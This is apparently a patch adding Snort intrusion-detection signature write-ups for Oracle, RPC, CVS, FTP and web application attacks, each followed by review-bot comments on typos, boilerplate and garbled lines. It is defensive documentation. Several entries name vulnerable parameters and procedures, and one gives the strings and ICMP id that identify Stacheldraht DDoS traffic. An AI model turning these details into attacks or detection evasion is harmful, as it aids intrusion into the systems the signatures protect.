+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
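Review bot: Affected Systems is empty, and the entry never says which protocol the rule inspects: Detailed Information lists "web, web applications and ftp servers" while Attack Scenarios talks only about browsing outside the ftp root, so state which traffic sid 1498 matches and list the servers it applies to. Additional References is also empty.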
--- /dev/null
+++ b/doc/signatures/3281.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3281
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
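Review bot: "Expoit code exists" under Ease of Attack is a typo for "Exploit". More substantively, the Detailed Information says the overflow is triggered by "malformed data via RPC" while the Attack Scenarios says "a request for a file with an overly long filename via a network share"; the doc should state which RPC interface and request the rule actually matches and which field in it is oversized, otherwise the two paragraphs appear to describe different attacks. Additional References is empty for what is described as a "known vulnerability"; the Microsoft bulletin and CVE entry should be cited. Note also that 3312.txt later in this patch is word-for-word identical to this file; at least one of the two should say what distinguishes its rule.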
--- /dev/null
+++ b/doc/signatures/1403.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1403
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+Viewcode can be used to vew the source code for your server's asp files.
+These files could contain login names and other sensitive information.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky McAtee <rmcatee@sourcefire.com>
+
+--
+Additional References:
+
+--
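Review bot: the only rule-specific sentence in 1403.txt, "Viewcode can be used to vew the source code for your server's asp files", is buried under three paragraphs of generic web-server boilerplate and contains a typo ("vew"). The Summary should say directly that the event fires on a request for the Viewcode sample script, since that is what the rule detects, and the generic paragraphs about credential checking and buffer overflows should be cut or shortened because they do not apply to a source-disclosure script. "attackers choosing" should be "attacker's choosing" here and in the other files that reuse this paragraph.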
--- /dev/null
+++ b/doc/signatures/3452.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3452
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
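Review bot: "false postives from occuring" is misspelled twice in 3452.txt (the Summary sentence is pasted verbatim into Detailed Information); it should read "false positives from occurring". The doc also never says how the rule supports other rules: it should name the flowbit this rule sets and which sids test it, otherwise an analyst who sees the rule in a policy has no way to tell whether it can be disabled.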
--- /dev/null
+++ b/doc/signatures/2631.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2631
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "refresh_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
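Review bot: "a Oracle database implementation" in the Summary should be "an Oracle database implementation". The sentence about setting "$ORACLE_PORTS" to "any" on Windows is deployment guidance, not a description of the vulnerability, so it belongs under Corrective Action or a separate configuration note, and it should explain why widening the variable is needed (presumably because sessions are redirected away from the listener port on that platform) so that operators understand the performance trade-off. In Attack Scenarios, "gowner" is a procedure parameter rather than a "variable". A vendor alert or CVE entry should be added to Additional References alongside the appsecinc link.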
--- /dev/null
+++ b/doc/signatures/2583.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2583
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with CVS.
+
+--
+Impact:
+A successful attack may perform a buffer overflow or a denial of service by
+either causing the CVS server to terminate abruptly or causing an exhaustion of
+disk resources.
+
+--
+Detailed Information:
+A CVS client transaction may reference a file using a relative path
+requiring the use of a directory traversal.  The Max-dotdot keyword and
+appropriate argument are created by the CVS client software to handle
+relative paths.  The appropriate argument represents the maximum number of
+directory levels to be traversed.  It is possible for an attacker
+to supply an overly large value to the Max-dotdot keyword, causing an
+incorrect allocation of memory and possibly causing a buffer overflow or the CVS
+server to crash.  In addition, temporary files are not deleted enabling a disk
+resource exhaustion attack, if repeated many times.  It should be noted
+that an attacker must have CVS access privileges in order to attempt
+these attacks.
+
+
+--
+Affected Systems:
+CVS versions 1.12.8 with the exception of version 1.11.17
+
+--
+Attack Scenarios:
+An attacker can connect to a CVS server and craft an overly large Max-dotdot
+argument value, causing a buffer overflow or causing the vulnerable CVS server
+to crash.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0417
+
+Bugtraq:
+http://www.securityfocus.com/bid/10499
+
+
+--
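Review bot: the Affected Systems line "CVS versions 1.12.8 with the exception of version 1.11.17" is garbled; 1.11.17 cannot be an exception to a single 1.12.x version. Spell out the two branches explicitly, for example "CVS 1.11.x prior to 1.11.17 and CVS 1.12.x up to and including 1.12.8", and check the ranges against the cited CAN-2004-0417 entry. The "Additional References" heading is missing its trailing colon, unlike every other file in this patch.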
--- /dev/null
+++ b/doc/signatures/2854.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2854
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_snapshot_support
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
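Review bot: in 2854.txt the sentence "vulnerability in the procedure generate_snapshot_support\n. This procedure is included in\ndbms_repcat." has a line break between the procedure name and the full stop, which leaves a line that starts with a period; join it as "vulnerability in the procedure generate_snapshot_support. This procedure is included in dbms_repcat." (or name it once as dbms_repcat.generate_snapshot_support). "Oracle Oracle9i" under Affected Systems duplicates the vendor name. Additional References is empty; the Oracle alert for the dbms_repcat overflows should be cited.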
--- /dev/null
+++ b/doc/signatures/545.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid: 
+545
+
+--
+Summary: 
+This event is generated when an attempt is made to navigate in an FTP sessions to a hidden directory named "/ ".
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to navigate on an FTP server to the "/ " directory to list or store unauthorized files such as unlicensed software.
+
+--
+Detailed Information: 
+An attacker may attempt to hide unauthorized files in a hidden directory named "/ ".   This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software. 
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may navigate to the hidden directory named "/ " to list or store unauthorized files.
+
+--
+Ease of Attack: 
+Simple.
+
+--
+False Positives: 
+It is remotely possible that an authorized directory exists named "/ ".
+
+--
+False Negatives: 
+Hidden directories other than those named "/ " may be used to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+-- 
+Additional References:
+
+--
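Review bot: the directory name "/ " in 545.txt is a slash followed by a single space, which is invisible on the page and easily lost when the file is edited or reflowed; say so explicitly, e.g. 'a directory whose name is a single space character ("/ ")', in the Summary and Detailed Information. "navigate in an FTP sessions" should be "navigate in an FTP session".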
--- /dev/null
+++ b/doc/signatures/2018.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2018
+
+--
+Summary:
+This event is generated when a request is made to list remotely mounted Network File System (NFS) directories. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover NFS file systems that have been mounted.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of mounted file systems.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the mounted NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list mounted NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
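Review bot: the Detailed Information in 2018.txt explains how mountd handles a mount request, but the Summary says the rule fires on a request to list mounted file systems; the paragraph should name the mountd procedure the rule matches and whether it is the TCP or UDP variant, since both exist as separate sids. In Corrective Action, "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" reads as if the machines themselves are being denied; reword to "so that external hosts cannot reach RPC-enabled machines".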
--- /dev/null
+++ b/doc/signatures/1615.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1615
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
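Review bot: 1615.txt contains nothing specific to sid 1615; every paragraph is the generic web-server template also used in 1403.txt. The Summary and Detailed Information should state which URI, script or parameter the rule matches and what the attacker gains from it, otherwise the doc gives an analyst no way to triage the alert. "attackers choosing" should be "attacker's choosing".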
--- /dev/null
+++ b/doc/signatures/1856.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1856
+
+--
+Summary:
+This event is generated when activity indicating the presence of a
+variant of the Stacheldraht DDOS tool is detected.
+
+--
+Impact:
+Distributed Denial of Service (DDoS) is possible.
+
+--
+Detailed Information:
+Stracheldraht is a Distributed denial of service tool normally found on
+Sun Solaris machines. It is made up of a Client, handler and agent. The
+clients connects to the handler. Handlers can connect with up to 1000
+agents. Communication between the client and the handler is conducted
+using tcp and the communication between the handler and the agent can be
+either tcp or icmp_echoreply. This rule detects the message sent from
+the handler to the agent. This message is used to respond to a agent
+message "skillz". The handler will reply with the string "ficken". This
+traffic differs from the traffic described on
+http://staff.washington.edu/dittrich/misc/stacheldraht.analysis because
+the packets have an icmp id of 6667 rather than 667 as noted in the analysis.
+
+--
+Affected Systems:
+	Sun Solaris
+
+--
+Attack Scenarios:
+The agent can be used to mount a distributed denial of service attack. It
+also indicates that a machine is compromised.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+The icmp id along with the keywords may be changed in the
+source code which would then evade this rule.
+
+--
+Corrective Action:
+Disconnect power from the machine and perform forensic analysis on the
+hard drives.
+
+--
+Contributors:
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
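Review bot: "Stracheldraht" at the start of Detailed Information is a typo for "Stacheldraht", "DDOS" in the Summary should match the "DDoS" used elsewhere, and "a agent message" should be "an agent message". The Corrective Action "Disconnect power from the machine and perform forensic analysis on the hard drives" discards the volatile evidence (running processes, open sockets to the handler) that would identify the rest of the DDoS network; suggest isolating the host from the network and capturing memory and connection state before powering it down, or at least noting that trade-off.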
--- /dev/null
+++ b/doc/signatures/2022.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2022
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+machine being dismounted via TCP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
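Review bot: the Summary of 2022.txt is not a sentence: "The RPC service mountd enables clients to connect to networked file machine being dismounted via TCP" has lost several words. It should describe the event the rule generates, e.g. "This event is generated when an unmount request is sent to the mountd RPC service over TCP." The Attack Scenarios paragraph is a comma splice ("This is an intelligence gathering activity, the attacker could ...") and should be split into two sentences.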
--- /dev/null
+++ b/doc/signatures/100000860.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000860
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Francisco Charrua Photo-Gallery" application running on a webserver. Access to the file "room.php" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "room.php" script used by the "Francisco Charrua Photo-Gallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Francisco Charrua Photo-Gallery
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
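Review bot: 100000860.txt opens with two blank lines before "Rule:" and drops the blank line before "--" after the Sid, unlike the other signature docs; both should be normalised. "running ona web server" is a typo for "on a", and "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"). The third paragraph of Detailed Information, about applications that "do not perform stringent checks when validating the credentials of a client host", is generic authentication boilerplate that does not describe SQL injection and should be dropped; the Corrective Action could instead mention validating the "id" parameter and using parameterised queries.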
--- /dev/null
+++ b/doc/signatures/110-1.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+110-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically a cgi null
+attack was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
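Review bot: the Attack Scenarios section in 110-1.txt is empty and the Summary never explains what the pre-processor means by a "cgi null attack"; the doc should say what byte sequence in the request triggers the event and why it matters, otherwise "Impact: Unknown" is all the analyst has. "consititute" in Detailed Information is a typo for "constitute".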
--- /dev/null
+++ b/doc/signatures/2810.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2810
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
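Review bot: 2810.txt has the same defects as 2854.txt: the procedure name "unregister_snapshot_repgroup" is followed by a line that begins with a full stop, so the sentence should be joined as "vulnerability in the procedure unregister_snapshot_repgroup. This procedure is included in dbms_repcat.", and "Oracle Oracle9i" repeats the vendor name. Additional References is empty; cite the Oracle alert for the dbms_repcat overflows.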
--- /dev/null
+++ b/doc/signatures/2035.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2035
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate wether a host is up or 
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and wether rpc 
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
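Review bot: "wether" appears in both the Summary and the Impact of 2035.txt and should be "whether". The Summary defines what NSM is rather than describing the event; it should read along the lines of "This event is generated when a status request is sent to the Network Status Monitor (NSM) RPC service." The lowercase "rpc" in this file should be "RPC" for consistency with the rest of the docs.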
--- /dev/null
+++ b/doc/signatures/100000667.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000667
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "files.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "files.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
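Review bot: the Attack Scenarios in 100000667.txt describes an authentication bypass ("access an authentication mechanism and supply his/her own credentials"), which is not what a remote file include is; replace it with the actual scenario, e.g. "An attacker supplies the URL of a PHP file under their control in the header_prog parameter of files.php; if the server fetches and includes it, the attacker's code runs with the privileges of the web server." "running ona web server" is a typo for "on a", "may indicate that an exploitation attempt has been attempted" is redundant, and Additional References is empty.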
--- /dev/null
+++ b/doc/signatures/100000554.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000554
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "tid" parameter in the "error.php" script used 
+by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
